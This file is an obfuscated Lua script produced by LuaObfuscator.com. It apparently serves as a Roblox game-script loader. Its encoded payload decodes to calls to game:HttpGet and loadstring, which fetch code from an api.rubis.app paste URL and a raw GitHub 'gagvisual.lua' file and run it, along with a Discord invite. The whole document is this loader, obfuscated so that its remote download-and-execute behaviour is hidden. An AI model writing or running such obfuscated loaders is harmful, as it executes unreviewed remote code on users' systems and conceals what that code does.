--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v84=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v84,v19);v19=nil;v91=1;end end else return v84;end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -(0 + 0))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;else local v86=568 -(367 + 201) ;local v87;while true do if (v86==(1270 -(226 + 232 + 812))) then v87=(929 -(214 + (1670 -(892 + 65))))^(v32-1) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or 0 ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=351 -(87 + 263) ;end if (v34==((133 + 48) -((164 -97) + 113))) then return v35;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if ((0 -0)==v36) then v37,v38=v1(v16,v18,v18 + ((2141 -(1069 + 118)) -(802 + 150)) );v18=v18 + 2 ;v36=1;end if (v36==(2 -1)) then return (v38 * (464 -208)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v42 * (38062656 -21285440)) + (v41 * (143357 -77821)) + (v40 * (45 + 211)) + v39 ;end local function v24() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((1 + 3) -1)) then if (v48==(0 + 0)) then if (v47==0) then return v49 * 0 ;else v48=792 -(368 + 423) ;v46=0 -0 ;end elseif (v48==((730 + 1335) -(10 + 8))) then return ((v47==(0 -0)) and (v49 * ((443 -(416 + 26))/((885 -(261 + 624)) -0)))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((1 + 1)^52))) ;end if ((1 -0)==v43) then v46=1;v47=(v20(v45,1,(813 -355) -(145 + 293) ) * ((432 -(44 + 386))^(1518 -(998 + 488)))) + v44 ;v43=1 + 1 ;end if (((1082 -(1020 + 60)) + (1423 -(630 + 793)))==v43) then v48=v20(v45,793 -(201 + (1934 -1363)) ,1169 -(116 + 1022) );v49=((v20(v45,133 -101 )==(1 + 0)) and  -(3 -2)) or (3 -2) ;v43=862 -(814 + 45) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;local v52={};for v67=1748 -(760 + 987) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v69=(function() return 1835 -(274 + 1561) ;end)();while true do if (v69==(2 -1)) then if (v53==(2 + 0)) then v58[ #"91("]=(function() return v21();end)();for v101= #"|",v23() do local v102=(function() return v21();end)();if (v20(v102, #"]", #"<")~=0) then else local v132=(function() return 241 -(187 + 54) ;end)();local v133=(function() return;end)();local v134=(function() return;end)();local v135=(function() return;end)();local v136=(function() return;end)();while true do if (v132~=(782 -(162 + 618))) then else while true do if (v133~= #" ") then else local v195=(function() return 0 + 0 ;end)();local v196=(function() return;end)();while true do if (v195==0) then v196=(function() return 0 + 0 ;end)();while true do if (v196~=1) then else v133=(function() return 3 -1 ;end)();break;end if (v196~=(0 -0)) then else v136=(function() return {v22(),v22(),nil,nil};end)();if (v134==(0 + 0)) then local v207=(function() return 0;end)();local v208=(function() return;end)();while true do if (v207==0) then v208=(function() return 0;end)();while true do if (v208==(1636 -(1373 + 263))) then v136[ #"91("]=(function() return v22();end)();v136[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v134== #"|") then v136[ #"xxx"]=(function() return v23();end)();elseif (v134==2) then v136[ #"gha"]=(function() return v23() -((1002 -(451 + 549))^(6 + 10)) ;end)();elseif (v134== #"nil") then local v216=(function() return 0;end)();local v217=(function() return;end)();while true do if (v216~=0) then else v217=(function() return 0 -0 ;end)();while true do if (v217~=(0 -0)) then else v136[ #"xnx"]=(function() return v23() -((1386 -(746 + 638))^(7 + 9)) ;end)();v136[ #"http"]=(function() return v22();end)();break;end end break;end end end v196=(function() return 1 -0 ;end)();end end break;end end end if (v133~=(341 -(218 + 123))) then else local v197=(function() return 1581 -(1535 + 46) ;end)();while true do if (v197~=(1 + 0)) then else v133=(function() return  #"{";end)();break;end if (0~=v197) then else v134=(function() return v20(v102,2, #"19(");end)();v135=(function() return v20(v102, #"asd1",6);end)();v197=(function() return 1;end)();end end end if (v133== #"19(") then if (v20(v135, #"xxx", #"nil")== #"}") then v136[ #"xnxx"]=(function() return v60[v136[ #".dev"]];end)();end v55[v101]=(function() return v136;end)();break;end if (v133==(1 + 1)) then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (v199~=0) then else v200=(function() return 0;end)();while true do if (v200~=1) then else v133=(function() return  #"asd";end)();break;end if (v200~=0) then else if (v20(v135, #" ", #":")== #"[") then v136[2]=(function() return v60[v136[562 -(306 + 254) ]];end)();end if (v20(v135,1 + 1 ,3 -1 )== #"~") then v136[ #"19("]=(function() return v60[v136[ #"asd"]];end)();end v200=(function() return 1;end)();end end break;end end end end break;end if (v132~=1) then else local v170=(function() return 1467 -(899 + 568) ;end)();while true do if (v170~=(1 + 0)) then else v132=(function() return 2;end)();break;end if (0~=v170) then else v135=(function() return nil;end)();v136=(function() return nil;end)();v170=(function() return 2 -1 ;end)();end end end if ((603 -(268 + 335))==v132) then local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171~=0) then else v172=(function() return 0;end)();while true do if (v172==1) then v132=(function() return 291 -(60 + 230) ;end)();break;end if ((572 -(426 + 146))==v172) then v133=(function() return 0;end)();v134=(function() return nil;end)();v172=(function() return 1;end)();end end break;end end end end end end for v103= #"{",v23() do v56,v103,v28=(function() return v54(v56,v103,v28);end)();end return v58;end break;end if (v69==0) then if (v53~=1) then else local v98=(function() return 0 + 0 ;end)();local v99=(function() return;end)();while true do if ((1456 -(282 + 1174))==v98) then v99=(function() return 0;end)();while true do if (v99~=1) then else v60=(function() return {};end)();for v174= #" ",v59 do local v175=(function() return 811 -(569 + 242) ;end)();local v176=(function() return;end)();local v177=(function() return;end)();local v178=(function() return;end)();while true do if (v175~=(2 -1)) then else v178=(function() return nil;end)();while true do if (v176~=1) then else if (v177== #"|") then v178=(function() return v21()~=0 ;end)();elseif (v177==2) then v178=(function() return v24();end)();elseif (v177== #"xxx") then v178=(function() return v25();end)();end v60[v174]=(function() return v178;end)();break;end if (v176~=(0 + 0)) then else v177=(function() return v21();end)();v178=(function() return nil;end)();v176=(function() return 1025 -(706 + 318) ;end)();end end break;end if (v175~=(1251 -(721 + 530))) then else v176=(function() return 0;end)();v177=(function() return nil;end)();v175=(function() return 1;end)();end end end v99=(function() return 1273 -(945 + 326) ;end)();end if (v99==(0 -0)) then v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v99=(function() return 1;end)();end if (2==v99) then v53=(function() return 2 + 0 ;end)();break;end end break;end end end if (v53~=(700 -(271 + 429))) then else local v100=(function() return 0;end)();while true do if (v100==(0 + 0)) then v54=(function() return function(v163,v164,v165) local v166=(function() return 1500 -(1408 + 92) ;end)();local v167=(function() return;end)();while true do if ((1086 -(461 + 625))~=v166) then else v167=(function() return 1288 -(993 + 295) ;end)();while true do if (v167~=(0 + 0)) then else local v202=(function() return 0;end)();while true do if (v202~=0) then else local v206=(function() return 0;end)();while true do if (v206==0) then v163[v164-#"!" ]=(function() return v165();end)();return v163,v164,v165;end end end end end end break;end end end;end)();v55=(function() return {};end)();v100=(function() return 1;end)();end if (v100~=(1172 -(418 + 753))) then else v56=(function() return {};end)();v57=(function() return {};end)();v100=(function() return 1 + 1 ;end)();end if (v100==2) then v53=(function() return 1 + 0 ;end)();break;end end end v69=(function() return 1;end)();end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[1 + 1 ];local v66=v61[1 + 2 ];return function(...) local v70=v64;local v71=v65;local v72=v66;local v73=v27;local v74=530 -(406 + (462 -339)) ;local v75= -(1770 -((3410 -(1477 + 184)) + 20));local v76={};local v77={...};local v78=v12("#",...) -(1 + 0) ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + (1323 -(1249 + (98 -25))) ];else v80[v88]=v77[v88 + 1 + 0 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=(1151 -(466 + 679))) then if (v83<=2) then if (v83<=(0 -0)) then local v104=v82[2];local v105,v106=v73(v80[v104](v13(v80,v104 + (2 -(1 + 0)) ,v82[1903 -(106 + 1794) ])));v75=(v106 + v104) -(1 + (856 -(564 + 292))) ;local v107=0 + 0 ;for v137=v104,v75 do v107=v107 + 1 ;v80[v137]=v105[v107];end elseif (v83>(2 -1)) then do return;end else v80[v82[5 -(4 -1) ]]=v82[117 -(4 + 110) ]~=((1759 -1175) -(57 + 527)) ;end elseif ((v83<=(1431 -(41 + 1386))) or (1871<636)) then if ((v83==((410 -(244 + 60)) -(17 + 86))) or (4061<2572)) then v74=v82[3 + 0 ];else local v145=v82[2];local v146=v80[v82[6 -3 ]];v80[v145 + 1 ]=v146;v80[v145]=v146[v82[11 -(6 + 1) ]];end elseif (v83>(171 -(122 + 44))) then if (v80[v82[478 -(41 + 435) ]]==v82[6 -2 ]) then v74=v74 + (3 -2) ;else v74=v82[3];end else for v168=v82[2],v82[3 + 0 ] do v80[v168]=nil;end end elseif (v83<=(2 + 7)) then if (v83<=(13 -6)) then local v108;local v109,v110;local v111;local v112;v80[v82[(1068 -(938 + 63)) -(30 + 27 + 8) ]]=v63[v82[3 + 0 ]];v74=v74 + (1258 -(1043 + 214)) ;v82=v70[v74];v112=v82[2];v111=v80[v82[3]];v80[v112 + (3 -2) ]=v111;v80[v112]=v111[v82[4]];v74=v74 + (1213 -((1448 -(936 + 189)) + 293 + 596)) ;v82=v70[v74];v80[v82[(1618 -(1565 + 48)) -3 ]]=v82[583 -(223 + 138 + 219) ];v74=v74 + (321 -(53 + 267)) ;v82=v70[v74];v80[v82[1 + 1 ]]=v82[416 -(15 + 398) ]~=(982 -(18 + 964)) ;v74=v74 + (3 -2) ;v82=v70[v74];v112=v82[2 + 0 ];v109,v110=v73(v80[v112](v13(v80,v112 + 1 + 0 ,v82[3])));v75=(v110 + v112) -(851 -(20 + 830)) ;v108=0 + (1138 -(782 + 356)) ;for v140=v112,v75 do v108=v108 + 1 ;v80[v140]=v109[v108];end v74=v74 + (127 -(116 + 10)) ;v82=v70[v74];v112=v82[2];v80[v112]=v80[v112](v13(v80,v112 + 1 + 0 ,v75));v74=v74 + (739 -(542 + 196)) ;v82=v70[v74];v80[v82[(270 -(176 + 91)) -1 ]]();v74=v74 + 1 ;v82=v70[v74];v80[v82[1 + 1 ]]=v63[v82[2 + (2 -1) ]];v74=v74 + 1 + 0 ;v82=v70[v74];v80[v82[4 -2 ]]=v63[v82[7 -4 ]];v74=v74 + (1552 -((1659 -533) + 425)) ;v82=v70[v74];v112=v82[407 -(118 + 287) ];v111=v80[v82[11 -8 ]];v80[v112 + (1122 -((1210 -(975 + 117)) + 1003)) ]=v111;v80[v112]=v111[v82[11 -7 ]];elseif ((1881>=1293) and (v83==(385 -(142 + 235)))) then v80[v82[9 -7 ]]=v63[v82[1 + 2 ]];else v80[v82[979 -(553 + 424) ]]();end elseif (v83<=11) then if (v83==(18 -8)) then local v152=v82[2 + 0 ];v80[v152]=v80[v152](v13(v80,v152 + 1 + 0 ,v75));else local v154=0 + 0 ;local v155;while true do if ((2357==2357) and (v154==(0 + 0))) then v155=v82[1877 -(157 + 1718) ];v80[v155](v80[v155 + 1 + 0 ]);break;end end end elseif ((123==123) and (v83>(10 + 2))) then local v156=0;local v157;local v158;local v159;local v160;while true do if (((17 -9)==v156) or (1056>=3392)) then v74=v82[7 -4 ];break;end if (v156==(8 -(14 -10))) then v82=v70[v74];v160=v82[1 + 1 ];v80[v160]=v80[v160](v13(v80,v160 + 1 ,v75));v156=24 -19 ;end if ((v156==7) or (1081<1075)) then v80[v160](v80[v160 + (754 -(239 + 514)) ]);v74=v74 + (3 -2) ;v82=v70[v74];v156=3 + 5 ;end if (v156==0) then v157=nil;v158,v159=nil;v160=nil;v156=1330 -(797 + 532) ;end if (v156==5) then v74=v74 + 1 + 0 ;v82=v70[v74];v80[v82[1 + 1 ]]=v82[6 -3 ];v156=(2226 -(697 + 321)) -(373 + 829) ;end if ((v156==(734 -(476 + 255))) or (1049>=4432)) then v157=0;for v193=v160,v75 do local v194=0;while true do if (v194==(1130 -((1004 -635) + 761))) then v157=v157 + 1 + 0 ;v80[v193]=v158[v157];break;end end end v74=v74 + (1 -0) ;v156=7 -3 ;end if (v156==((505 -266) -(64 + (400 -226)))) then v80[v82[1 + 1 ]]=v82[3 -0 ]~=(336 -(144 + 192)) ;v74=v74 + (217 -(42 + 174)) ;v82=v70[v74];v156=2 + 0 ;end if (v156==(2 + 0)) then v160=v82[2];v158,v159=v73(v80[v160](v13(v80,v160 + 1 + 0 ,v82[1507 -(363 + 1141) ])));v75=(v159 + v160) -1 ;v156=1583 -(1183 + 397) ;end if (((18 -12)==v156) or (4768<=846)) then v74=v74 + 1 + 0 ;v82=v70[v74];v160=v82[2 + 0 + 0 ];v156=1982 -(1913 + 62) ;end end else v80[v82[2 + 0 ]]=v82[7 -4 ];end v74=v74 + (1934 -(565 + 1368)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F663457387961767075773753587559692F72617703503Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F663473686E2F6D61696E2F726566732F68656164732F6D61696E2F67616D65732F67616776697375616C2E6C756103153Q00646973636F72642E2Q672F63737875326E436B7739001D3Q00120C3Q00014Q0005000100013Q0026063Q0002000100010004033Q0002000100120C000100013Q00260600010005000100010004033Q00050001001208000200023Q001207000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400120C000500064Q000D000600016Q000300066Q00023Q000200122Q000300076Q00020002000100044Q001C00010004033Q000500010004033Q001C00010004033Q000200012Q00023Q00017Q00",v9(),...);
